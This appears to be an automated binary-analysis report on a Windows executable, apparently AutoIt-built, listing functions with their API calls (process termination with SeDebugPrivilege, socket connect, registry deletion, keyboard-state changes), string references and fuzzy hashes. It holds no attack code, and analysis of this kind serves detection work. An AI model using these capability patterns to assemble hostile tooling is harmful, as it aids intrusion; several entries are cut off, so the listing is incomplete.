                                                              • Instruction ID: 70dccc8d23a24c8ac5b2d36c23d1fc0ed308eed34d74bf8a4b11e0e697da6625
                                                              • Opcode Fuzzy Hash: f61be43bb8a549cd9dad831aeb1a4a8effc801e856b1440697cddf08235fc6c0
                                                              • Instruction Fuzzy Hash: 8E01BBB5240348FFE710ABA5DC8DF6B3BACEB89711F104825FA05DB1A1CA759C14CB24
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Variant$ClearInit
                                                              • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                              • API String ID: 2610073882-2080382077
                                                              • Opcode ID: 4013e02310124dc19a24c960c86c17278dc50ef420e9ab73daa2bbda93c8a083
                                                              • Instruction ID: fcebb0c40d61f867c18811628665e3ff882c4d71f35d8502a0dec60dd81a9e36
                                                              • Opcode Fuzzy Hash: 4013e02310124dc19a24c960c86c17278dc50ef420e9ab73daa2bbda93c8a083
                                                              • Instruction Fuzzy Hash: 2791AD71A00215ABCF24DFA5C844FEFBBB8EF45714F10851AE519AB280D778AD05CFA8
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,004C43BA,00000104,?,00000001,00000000), ref: 0042A49A
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000001,00000000), ref: 0042A554
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000001,00000000), ref: 0042A5A3
                                                              Strings
                                                              Similarity
                                                              • API ID: File$HandleModuleNameWrite
                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                              • API String ID: 3784150691-4022980321
                                                              • Opcode ID: 6558d356d4fb72d9e578eb9f05dedf925c23385bc6d14cf4d5c971fd03e6a844
                                                              • Instruction ID: 186c83fd4b845c833e743025fb1ca7bd7b0fd00e4ef13018c7e0743ce814b104
                                                              • Opcode Fuzzy Hash: 6558d356d4fb72d9e578eb9f05dedf925c23385bc6d14cf4d5c971fd03e6a844
                                                              • Instruction Fuzzy Hash: EB418831B40331B7D7207669BC16FAF77586B95718F90013FFD0592282EA6C8EA4419E
                                                              APIs
                                                                • Part of subcall function 00463E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00463EB6
                                                                • Part of subcall function 00463E91: Process32FirstW.KERNEL32(00000000,?), ref: 00463EC4
                                                                • Part of subcall function 00463E91: CloseHandle.KERNEL32(00000000), ref: 00463F8E
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047ECB8
                                                              • GetLastError.KERNEL32 ref: 0047ECCB
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047ECFA
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047ED77
                                                              • GetLastError.KERNEL32(00000000), ref: 0047ED82
                                                              • CloseHandle.KERNEL32(00000000), ref: 0047EDB7
                                                              Strings
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: d210f5fba0b77d67c3e10e65e148b4b3e5ca715f1fd353a27fcbe2172b4d1d1e
                                                              • Instruction ID: 4cf0eb32de62198d0c9cb5bf7051436c97b1413fca3c9407eb77a24df7e76fd2
                                                              • Opcode Fuzzy Hash: d210f5fba0b77d67c3e10e65e148b4b3e5ca715f1fd353a27fcbe2172b4d1d1e
                                                              • Instruction Fuzzy Hash: 364180712002019FD724EF15CC95FAEB7A5AF44718F04846EF8469B2C2DB79AC09CB9A
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047FB5C
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047FB80
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047FBC0
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047FBE2
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FD5E
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FD90
                                                              • CloseHandle.KERNEL32(?), ref: 0047FDBF
                                                              • CloseHandle.KERNEL32(?), ref: 0047FE36
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 2947177986-0
                                                              • Opcode ID: 16747152b454cde32b069cda312c17f1d5783ae266d9b6325819c7904a237f4f
                                                              • Instruction ID: 1b9b8e5a807dcbe041a314dc5fa2e233be69bb52cf2b98a2e3215593ab0b3364
                                                              • Opcode Fuzzy Hash: 16747152b454cde32b069cda312c17f1d5783ae266d9b6325819c7904a237f4f
                                                              • Instruction Fuzzy Hash: E5E1A5312043419FC714EF25C491AABBBE1BF44314F14846EF8999B3A2DB39EC49CB5A
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 004632C5
                                                              Strings
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              • Opcode ID: 77fe609f7d7df2f5dc9ffe3ad1bea5ae7a1829eac4f59a579a3ff1f305724edc
                                                              • Instruction ID: bd39f8208ce013f69ee2957a59db9678c91d00ade58264490e67fb22ecbd3877
                                                              • Opcode Fuzzy Hash: 77fe609f7d7df2f5dc9ffe3ad1bea5ae7a1829eac4f59a579a3ff1f305724edc
                                                              • Instruction Fuzzy Hash: F41138313083967AA7015E55EC62DABB3ACDF19766F2000ABF40056281F67D5B1106BF
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • GetSystemMetrics.USER32(0000000F), ref: 0048D78A
                                                              • GetSystemMetrics.USER32(0000000F), ref: 0048D7AA
                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D9E5
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048DA03
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048DA24
                                                              • ShowWindow.USER32(00000003,00000000), ref: 0048DA43
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0048DA68
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048DA8B
                                                              Similarity
                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                              • String ID:
                                                              • API String ID: 1211466189-0
                                                              • Opcode ID: f70638cb6bdb2bd2f28f86c149af183c7a65bc4c621125ccc619a6dbdc1ddf3f
                                                              • Instruction ID: eb940e76658434b7ad8eeabe1703afeb33935e81992f953b53c46158808d9c3e
                                                              • Opcode Fuzzy Hash: f70638cb6bdb2bd2f28f86c149af183c7a65bc4c621125ccc619a6dbdc1ddf3f
                                                              • Instruction Fuzzy Hash: C9B19B71901215EBDF18EF68C9857BE7BB1FF48700F18847AEC48AB295D738A950CB58
                                                              APIs
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000), ref: 0043C46A
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000), ref: 0043C4D6
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: 5d7a265bfa4b2b0f4e892985f1cda791045749e89afcf4abe5dc01cf4c95db47
                                                              • Instruction ID: 8b6c8ed304f0763f3ef54d0254f4868818f2511668e6adff05f7a0ccbdd179e1
                                                              • Opcode Fuzzy Hash: 5d7a265bfa4b2b0f4e892985f1cda791045749e89afcf4abe5dc01cf4c95db47
                                                              • Instruction Fuzzy Hash: 7E41DC307046809ADB754B288EDC67B7B91AB95314F14883FE046B66E0CABDA846DB1D
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004641D4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004641E0
                                                              • LockResource.KERNEL32(00000000), ref: 004641ED
                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0046420D
                                                              • LoadResource.KERNEL32(?,00000000), ref: 0046421F
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0046422E
                                                              • LockResource.KERNEL32(?), ref: 0046423A
                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0046429B
                                                              Similarity
                                                              • API ID: Resource$FindLoadLock$CreateFromIconSizeof
                                                              • String ID:
                                                              • API String ID: 2263570339-0
                                                              • Opcode ID: 617cfa106917f647481d604454f566daa8b487215408bcc40d4d77f46b5c81fb
                                                              • Instruction ID: 68d0d4707ff35a66c4c8b16f9f52eea423942b7f780b82ff2ca14d9b92ff7368
                                                              • Opcode Fuzzy Hash: 617cfa106917f647481d604454f566daa8b487215408bcc40d4d77f46b5c81fb
                                                              • Instruction Fuzzy Hash: DE31B2B160121AAFCF019F60EC58EBF7BACEF45341F10497AF801D2150E738D9618BAA
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 0048645A
                                                              • GetDC.USER32(00000000), ref: 00486462
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0048646D
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00486479
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004864B5
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004864C6
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00489299,?,?,000000FF,00000000,?,000000FF,?), ref: 00486500
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00486520
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: a08a4c351fe61229cc76658797f0443f2142c1b396e55029449042c7d66d5f33
                                                              • Instruction ID: 5c1cc6793609d5e6e0acb9b007d1b286434c541ad31a2caf87ecf1e2a9c9b5d4
                                                              • Opcode Fuzzy Hash: a08a4c351fe61229cc76658797f0443f2142c1b396e55029449042c7d66d5f33
                                                              • Instruction Fuzzy Hash: D4319F72201214BFEB109F50DC4AFEB3FA9EF09765F040069FE08AA295D6759C41CB68
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09c15824ac63a65c0734988e0de1478892bca8845b386477e243a1c01ae4827c
                                                              • Instruction ID: 504086b8ac0d12f7a80c9a28070c24604f60f8592932f63d6c8978218f7d0df9
                                                              • Opcode Fuzzy Hash: 09c15824ac63a65c0734988e0de1478892bca8845b386477e243a1c01ae4827c
                                                              • Instruction Fuzzy Hash: CF718170900109EFCB04DF94CC84EBFBB74FF85314F10816AF915AA2A1C738AA11CBA9
                                                              APIs
                                                              • IsWindow.USER32(0106B0C0), ref: 0048B6A5
                                                              • IsWindowEnabled.USER32(0106B0C0), ref: 0048B6B1
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B795
                                                              • SendMessageW.USER32(0106B0C0,000000B0,?,?), ref: 0048B7CC
                                                              • IsDlgButtonChecked.USER32(?,?), ref: 0048B809
                                                              • GetWindowLongW.USER32(0106B0C0,000000EC), ref: 0048B82B
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B843
                                                              Similarity
                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                              • String ID:
                                                              • API String ID: 4072528602-0
                                                              • Opcode ID: ff14fa38de5f0b27e4dc6a9d98642c1f41753b175040c623b2d1a44597c1e3a2
                                                              • Instruction ID: a7d0881697c90ebb8ac62a69b5506f8dd5c31139f9226510073890e22dad6404
                                                              • Opcode Fuzzy Hash: ff14fa38de5f0b27e4dc6a9d98642c1f41753b175040c623b2d1a44597c1e3a2
                                                              • Instruction Fuzzy Hash: 3A719034600304AFDB20AF64C894FAE7BB9FF49300F15486EE945A7361D739A841DB9D
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0046149C
                                                              • GetKeyboardState.USER32(?), ref: 004614B1
                                                              • SetKeyboardState.USER32(?), ref: 00461512
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461540
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046155F
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 004615A5
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004615C8
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                              • Instruction ID: 1ad2f9c427477234de6172a5734c88337e52b537abe48fa8ba5ad4ac1d5a2b9b
                                                              • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                              • Instruction Fuzzy Hash: A451F4A0A043D53EFB324634CC45BBBBEA95B46304F0C848FE1D6569E2E69CDC84D75A
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 004612B5
                                                              • GetKeyboardState.USER32(?), ref: 004612CA
                                                              • SetKeyboardState.USER32(?), ref: 0046132B
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00461357
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00461374
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004613B8
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004613D9
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                              • Instruction ID: b99961755fe5fc4aaf7fc08d4f592ff79c76eb46e067809845c5d5ed139ad427
                                                              • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                              • Instruction Fuzzy Hash: 625114A09043C53DFB3282248C41B7B7FA95B06304F0C448BE4D596AE2F798ACC8D75A
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00487093
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 004870A7
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004870C1
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00487133
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00487161
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysListView32
                                                              • API String ID: 2326795674-78025650
                                                              • Opcode ID: b94ec508bdbd92bfc77db7aa8df4161c5d4b177e6850a474fd890b0e84a73c7f
                                                              • Instruction ID: 8d96cf30731f9aac7b823901c9e083a04a5181feac03be769610aafeab0db2a7
                                                              • Opcode Fuzzy Hash: b94ec508bdbd92bfc77db7aa8df4161c5d4b177e6850a474fd890b0e84a73c7f
                                                              • Instruction Fuzzy Hash: 7541B371904308AFDB21AF64CC85BEF77A8EF08354F20092BF544A7292D679DD858B68
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045DAC5
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045DAFB
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045DB0C
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045DB8E
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: ,,I$DllGetClassObject
                                                              • API String ID: 753597075-1683996018
                                                              • Opcode ID: bd04dc08d3ae7bfadbe53b5410b67b02ab652c227152baabf1e45b2858894097
                                                              • Instruction ID: bdd2be2ff8fd35e167879badfa90f04c80079ac5dfc6a7bed9592843198ac637
                                                              • Opcode Fuzzy Hash: bd04dc08d3ae7bfadbe53b5410b67b02ab652c227152baabf1e45b2858894097
                                                              • Instruction Fuzzy Hash: FC418271A00204EFDB25CF55C884A9A7BBAEF44311F1581AEED059F207D7B9ED48CBA4
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0048125C
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00481286
                                                              • FreeLibrary.KERNEL32(00000000), ref: 0048133D
                                                                • Part of subcall function 0048122D: RegCloseKey.ADVAPI32(?), ref: 004812A3
                                                                • Part of subcall function 0048122D: FreeLibrary.KERNEL32(?), ref: 004812F5
                                                                • Part of subcall function 0048122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481318
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 004812E0
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 59a0954294989c9cc7baee405be50d69b665d4c8366daf6602a98d2433ad7fc6
                                                              • Instruction ID: c705425fdb16329370bfebf572505c6039bd2b495d774f44f1cf002bfd069236
                                                              • Opcode Fuzzy Hash: 59a0954294989c9cc7baee405be50d69b665d4c8366daf6602a98d2433ad7fc6
                                                              • Instruction Fuzzy Hash: 4C311E71901109BFEB15AF90DC899FFB7BCEB09300F10097BE905E2251D6745E8A9BA8
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0048655B
                                                              • GetWindowLongW.USER32(0106B0C0,000000F0), ref: 0048658E
                                                              • GetWindowLongW.USER32(0106B0C0,000000F0), ref: 004865C3
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004865F5
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0048661F
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00486630
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0048664A
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 7e8e3cbf37106a76f055c8366b844854849938a8df03b0c0084bc4c9dc5da368
                                                              • Instruction ID: 885ea9d2648f7cf39bc3bf26eacc0d8c5cfc621d480c2aaf8e3cde1e4b1c4fac
                                                              • Opcode Fuzzy Hash: 7e8e3cbf37106a76f055c8366b844854849938a8df03b0c0084bc4c9dc5da368
                                                              • Instruction Fuzzy Hash: 65313430601150AFDB60EF18EC84F6A37E1FB4A310F1A4579F5019B2B5CB35AC44DB59
                                                              APIs
                                                                • Part of subcall function 004780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004780CB
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004764D9
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004764E8
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476521
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 0047652A
                                                              • WSAGetLastError.WSOCK32 ref: 00476534
                                                              • closesocket.WSOCK32(00000000), ref: 0047655D
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476576
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 910771015-0
                                                              • Opcode ID: 74c6652e652a631785c3cf5e66c26abcdfc8c244c4b2312955181242269b2fac
                                                              • Instruction ID: 88e8d7ad7378523e1ee53271d3cbf6d364baabb8775fd53d7e5544776c6eccb5
                                                              • Opcode Fuzzy Hash: 74c6652e652a631785c3cf5e66c26abcdfc8c244c4b2312955181242269b2fac
                                                              • Instruction Fuzzy Hash: 3B31D331600118AFDB10AF24DC85BFE7BA9EB44714F01803EFD09A7291CB78AD08CB69
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0045E0FA
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0045E120
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0045E123
                                                              • SysAllocString.OLEAUT32 ref: 0045E144
                                                              • SysFreeString.OLEAUT32 ref: 0045E14D
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0045E167
                                                              • SysAllocString.OLEAUT32(?), ref: 0045E175
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              APIs
                                                                • Part of subcall function 00429E4B: EnterCriticalSection.KERNEL32(00000000,?,00429CBC,0000000D), ref: 00429E76
                                                              • DecodePointer.KERNEL32(004BBB70,0000001C,004233C2,00000000,00000001,00000000,?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 004234B6
                                                              • DecodePointer.KERNEL32(?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 004234C7
                                                              • EncodePointer.KERNEL32(00000000,?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 004234E0
                                                              • DecodePointer.KERNEL32(-00000004,?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 004234F0
                                                              • EncodePointer.KERNEL32(00000000,?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 004234F6
                                                              • DecodePointer.KERNEL32(?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 0042350C
                                                              • DecodePointer.KERNEL32(?,00423310,000000FF,?,00429E6E,00000011,00000000,?,00429CBC,0000000D), ref: 00423517
                                                              Similarity
                                                              • API ID: Pointer$Decode$Encode$CriticalEnterSection
                                                              • String ID:
                                                              APIs
                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004878A1
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004878AE
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004878B9
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004878C8
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004878D4
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0046454E
                                                              • LoadStringW.USER32(00000000), ref: 00464555
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046456B
                                                              • LoadStringW.USER32(00000000), ref: 00464572
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004645B6
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00464593
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00424292,?), ref: 004241E3
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004241EA
                                                              • EncodePointer.KERNEL32(00000000), ref: 004241F6
                                                              • DecodePointer.KERNEL32(00000001,00424292,?), ref: 00424213
                                                              Strings
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004241B8), ref: 004242B8
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004242BF
                                                              • EncodePointer.KERNEL32(00000000), ref: 004242CA
                                                              • DecodePointer.KERNEL32(004241B8), ref: 004242E5
                                                              Strings
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              APIs
                                                                • Part of subcall function 004810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00480038,?,?), ref: 004810BC
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480548
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480588
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004805AB
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004805D4
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00480617
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480624
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                              • String ID:
                                                              APIs
                                                                • Part of subcall function 00431B11: SetFilePointerEx.KERNEL32(00000000,00000002,?,00000000,?,00000000,00000000,00000000,00000000,?,0042DC91,?,00000000,00000000,00000002,00000000), ref: 00431B48
                                                                • Part of subcall function 00431B11: GetLastError.KERNEL32(?,0042DC91,?,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00431B52
                                                              • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499,0048FB24,0000000C,00000080), ref: 00439A5B
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499,0048FB24,0000000C,00000080), ref: 00439A62
                                                              • GetProcessHeap.KERNEL32(00000000,0048FB24,?,?,?,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499), ref: 00439B04
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499,0048FB24), ref: 00439B0B
                                                              • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499), ref: 00439B41
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0048FB24,00000001,00000000,?,?,00438499,0048FB24), ref: 00439B71
                                                              Similarity
                                                              • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                              • String ID:
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00485A82
                                                              • GetMenuItemCount.USER32(00000000), ref: 00485AB9
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00485AE1
                                                              • GetMenuItemID.USER32(?,?), ref: 00485B50
                                                              • GetSubMenu.USER32(?,?), ref: 00485B5E
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00485BAF
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
                                                              • GetWindowRect.USER32(?,?), ref: 004017FE
                                                              • ScreenToClient.USER32(?,?), ref: 0040181B
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
                                                              • EndPaint.USER32(?,?), ref: 00401876
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                              • String ID:
                                                              • API String ID: 1827037458-0
                                                              APIs
                                                              • ShowWindow.USER32(004C67B0,00000000,0106B0C0,?,?,004C67B0,?,0048B862,?,?), ref: 0048B9CC
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0048B9F0
                                                              • ShowWindow.USER32(004C67B0,00000000,0106B0C0,?,?,004C67B0,?,0048B862,?,?), ref: 0048BA50
                                                              • ShowWindow.USER32(00000000,00000004,?,0048B862,?,?), ref: 0048BA62
                                                              • EnableWindow.USER32(00000000,00000001), ref: 0048BA86
                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048BAA9
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0046737F
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004673B6
                                                              • EnterCriticalSection.KERNEL32(?), ref: 004673D2
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0046744C
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00467461
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467480
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 3368777196-0
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00475134,?,?,00000000,00000001), ref: 004773BF
                                                                • Part of subcall function 00473C94: GetWindowRect.USER32(?,?), ref: 00473CA7
                                                              • GetDesktopWindow.USER32 ref: 004773E9
                                                              • GetWindowRect.USER32(00000000), ref: 004773F0
